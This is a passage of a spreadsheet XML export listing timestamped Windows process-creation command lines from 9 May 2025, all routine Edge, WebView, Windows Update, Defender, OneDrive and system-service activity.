    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /regsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:31.861</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:31.980</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:32.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:32.106</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:34.003</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\wuaucltcore.exe\" /DeploymentHandlerFullPath \\\\?\\C:\\Windows\\UUS\\Packages\\Preview\\AMD64\\UpdateDeploy.dll /ClassId 54c02a67-1309-4f4e-aafc-6061923884d2 /RunHandlerComServer</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:34.008</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:34.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:34.503</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:37.296</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:37.297</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:37.315</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:37.847</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:37.848</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:37.855</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:38.313</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:38.314</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:41.256</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:41.257</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:43.202</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNTciIHNoZWxsX3ZlcnNpb249IjEuMy4xODUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7M0RCRUQ0NjEtRjNBMi00RUFFLTk2MkEtNEZDNDQ4NTVBNUVBfSIgdXNlcmlkPSJ7NjlENzAzMDEtNTlDOS00MTM3LUExREYtNTM5QTUyNDkzRDFCfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7NDA4OTA3Q0UtQjEwOC00MjU1LThDQTgtNURGQjNGNUY4NDFGfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjQiIHBoeXNtZW1vcnk9IjIiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yNjEwMC4zNzc1IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlZNd2FyZSwgSW5jLiIgcHJvZHVjdF9uYW1lPSJWTXdhcmUyMCwxIi8-PGV4cCBldGFnPSImcXVvdDtFK3hiQXo2WTZzVTEyODliUzZxbDRWUkxia2pmQlVHVE1Kc2pySHI0NGlJPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQ5IiBuZXh0dmVyc2lvbj0iMS4zLjE5NS41NyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjQ1IiBpbnN0YWxsZGF0ZXRpbWU9IjE3NDI4NTMyMzAiIGNvaG9ydD0icnJmQDAuMTEiPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjM4ODUzOTUxNDIiLz48L2FwcD48L3JlcXVlc3Q-</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:43.652</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:45.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:49.552</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:49.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:49.696</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:50.113</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:55.241</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:55.242</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:55.243</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchFilterHost.exe\" 968 2708 2696 952 {8CD34779-9F10-4F9B-ADFB-B3FAEABDAB5A}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:57.147</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:57.148</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:57.805</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.240</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.314</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\SecurityHealthSystray.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.398</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\SecurityHealthService.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.401</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.402</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.403</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{F8BFC4FC-3DFA-4B3A-A893-2575E201E07E}\\MicrosoftEdge_X64_136.0.3240.50_135.0.3179.98.exe\" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:02.599</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:24:03.234</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:19.502</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{F8BFC4FC-3DFA-4B3A-A893-2575E201E07E}\\EDGEMITMP_6CA82.tmp\\setup.exe\" --install-archive=\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{F8BFC4FC-3DFA-4B3A-A893-2575E201E07E}\\MicrosoftEdge_X64_136.0.3240.50_135.0.3179.98.exe\" --previous-version=\"135.0.3179.98\" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:19.721</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{F8BFC4FC-3DFA-4B3A-A893-2575E201E07E}\\EDGEMITMP_6CA82.tmp\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{F8BFC4FC-3DFA-4B3A-A893-2575E201E07E}\\EDGEMITMP_6CA82.tmp\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff64b5cf3e8,0x7ff64b5cf3f4,0x7ff64b5cf400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:19.730</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:19.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:19.734</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:19.735</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:37.310</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.630</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.631</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.632</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.634</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.692</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.XboxGamingOverlay_7.225.4081.0_x64__8wekyb3d8bbwe\\GameBar.exe\" -ServerName:App.AppXbdkk0yrkwpcgeaem8zk81k8py1eaahny.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.935</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:38.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:39.317</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.XboxGamingOverlay_7.225.4081.0_x64__8wekyb3d8bbwe\\GameBarFTServer.exe\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:39.781</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:39.787</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.443</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.455</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.457</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.522</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:41.703</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:43.637</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:43.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:43.641</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:43.642</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\"</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{722D0F89-B69C-4700-AE8C-4A44350E4876}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:43.643</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\" /reporting</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:47.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:47.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:47.460</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:47.782</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:47.866</t>
  </si>
  <si>
    <t>\"BackgroundTransferHost.exe\" -ServerName:BackgroundTransferHost.1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:49.782</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x240,0x24c,0x248,0x1c8,0x270,0x7ffe30347088,0x7ffe30347094,0x7ffe303470a0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:52.122</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:54.970</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:55.348</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=1984 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:55.443</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\elevation_service.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:55.444</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\MicrosoftWindows.CrossDevice_1.25032.52.0_x64__cw5n1h2txyewy\\CrossDeviceService.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:55.446</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=2856 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:25:55.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.592</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.599</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=767455562 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:9</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.600</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.657</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.658</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=767827207 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.914</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.915</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:00.994</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=PooledProcess2 --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4612 /prefetch:14</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" GetDeviceTicket -AccessKey CDE05590-786D-15DF-C0E1-D27BFBC312B3</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:01.419</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:02.825</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\sc.exe\" start pushtoinstall login</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:02.826</t>
  </si>
  <si>
    <t>taskhostw.exe Logon</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:02.940</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:05.606</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:05.709</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:11.499</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:11.502</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:18.525</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{B81885CB-6C26-41B3-A6C8-F4F88D36E17D}\\MicrosoftEdge_X64_136.0.3240.50_135.0.3179.98.exe\" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:18.527</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\identity_helper.exe\" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4376 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:18.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:18.668</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:19.843</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:19.858</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\UCConfigTask.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:19.862</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:24.086</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:24.700</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:25.348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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:26.023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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:26.024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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:26.496</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:26.497</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:27.717</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:29.250</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --embedded-browser-webview=1 --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --noerrdialogs --disk-cache-size=52428800 --edge-webview-is-background --lang=en-GB --mojo-named-platform-channel-pipe=8592.2064.4610824399779119324 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:37.557</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:37.581</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:37.582</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=crashpad-handler --user-data-dir=C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView /prefetch:4 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d --monitor-self-annotation=ptype=crashpad-handler --database=C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=135.0.7049.115 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --annotation=plat=Win64 \"--annotation=prod=Edge WebView2\" --annotation=ver=135.0.3179.98 --initial-client-data=0x178,0x17c,0x180,0x154,0x188,0x7ffe36739240,0x7ffe3673924c,0x7ffe36739258</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:39.840</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{B81885CB-6C26-41B3-A6C8-F4F88D36E17D}\\EDGEMITMP_AE07F.tmp\\setup.exe\" --install-archive=\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{B81885CB-6C26-41B3-A6C8-F4F88D36E17D}\\MicrosoftEdge_X64_136.0.3240.50_135.0.3179.98.exe\" --previous-version=\"135.0.3179.98\" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:40.765</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:41.788</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=gpu-process --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1788,i,9932586443574054993,11319253262182182435,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=1744 /prefetch:2 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:41.821</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:26:42.616</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1788,i,9932586443574054993,11319253262182182435,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager 